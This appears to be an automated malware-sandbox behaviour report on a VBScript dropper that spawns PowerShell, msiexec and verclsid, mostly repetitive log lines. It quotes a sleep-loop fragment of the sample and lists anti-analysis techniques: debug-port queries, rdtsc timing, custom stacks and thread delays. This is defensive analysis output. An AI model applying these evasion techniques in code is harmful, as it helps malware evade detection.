Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Potential evasive VBS script found (sleep loop)

Source: Initial file

Initial file: Do While klageberettigelsernes.Status = 0 WScript.Sleep 100

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF90818D324
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF90818D7E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF90818D944
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF90818D504
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF90818D544
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF90818D1E4
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF908190154
Source: C:\Windows\SysWOW64\verclsid.exe	API/Special instruction interceptor: Address: 7FF90818DA44

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 10_2_2441D1C0 rdtsc

10_2_2441D1C0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5659	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4243	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7975	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1724	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

API coverage: 0.4 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -2767011611056431s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\verclsid.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 00000005.00000002.1513698907.000001BDABF70000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\verclsid.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 10_2_2441D1C0 rdtsc

10_2_2441D1C0

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 10_2_243E35C0 NtCreateMutant,LdrInitializeThunk,

10_2_243E35C0

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DA430 mov eax, dword ptr fs:[00000030h]	10_2_243DA430
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2445F453 mov eax, dword ptr fs:[00000030h]	10_2_2445F453
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439E420 mov eax, dword ptr fs:[00000030h]	10_2_2439E420
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439E420 mov eax, dword ptr fs:[00000030h]	10_2_2439E420
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439E420 mov eax, dword ptr fs:[00000030h]	10_2_2439E420
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439C427 mov eax, dword ptr fs:[00000030h]	10_2_2439C427
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243C340D mov eax, dword ptr fs:[00000030h]	10_2_243C340D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2447547F mov eax, dword ptr fs:[00000030h]	10_2_2447547F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243D8402 mov eax, dword ptr fs:[00000030h]	10_2_243D8402
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243D8402 mov eax, dword ptr fs:[00000030h]	10_2_243D8402
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243D8402 mov eax, dword ptr fs:[00000030h]	10_2_243D8402
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CA470 mov eax, dword ptr fs:[00000030h]	10_2_243CA470
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CA470 mov eax, dword ptr fs:[00000030h]	10_2_243CA470
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243CA470 mov eax, dword ptr fs:[00000030h]	10_2_243CA470
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A1460 mov eax, dword ptr fs:[00000030h]	10_2_243A1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A1460 mov eax, dword ptr fs:[00000030h]	10_2_243A1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A1460 mov eax, dword ptr fs:[00000030h]	10_2_243A1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A1460 mov eax, dword ptr fs:[00000030h]	10_2_243A1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A1460 mov eax, dword ptr fs:[00000030h]	10_2_243A1460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BF460 mov eax, dword ptr fs:[00000030h]	10_2_243BF460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BF460 mov eax, dword ptr fs:[00000030h]	10_2_243BF460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BF460 mov eax, dword ptr fs:[00000030h]	10_2_243BF460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BF460 mov eax, dword ptr fs:[00000030h]	10_2_243BF460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BF460 mov eax, dword ptr fs:[00000030h]	10_2_243BF460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243BF460 mov eax, dword ptr fs:[00000030h]	10_2_243BF460
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243C245A mov eax, dword ptr fs:[00000030h]	10_2_243C245A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243DE443 mov eax, dword ptr fs:[00000030h]	10_2_243DE443
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243D34B0 mov eax, dword ptr fs:[00000030h]	10_2_243D34B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243D44B0 mov ecx, dword ptr fs:[00000030h]	10_2_243D44B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A64AB mov eax, dword ptr fs:[00000030h]	10_2_243A64AB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_244754DB mov eax, dword ptr fs:[00000030h]	10_2_244754DB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_244494E0 mov eax, dword ptr fs:[00000030h]	10_2_244494E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_2439B480 mov eax, dword ptr fs:[00000030h]	10_2_2439B480
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A9486 mov eax, dword ptr fs:[00000030h]	10_2_243A9486
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 10_2_243A9486 mov eax, dword ptr fs:[00000030h]	10_2_243A9486
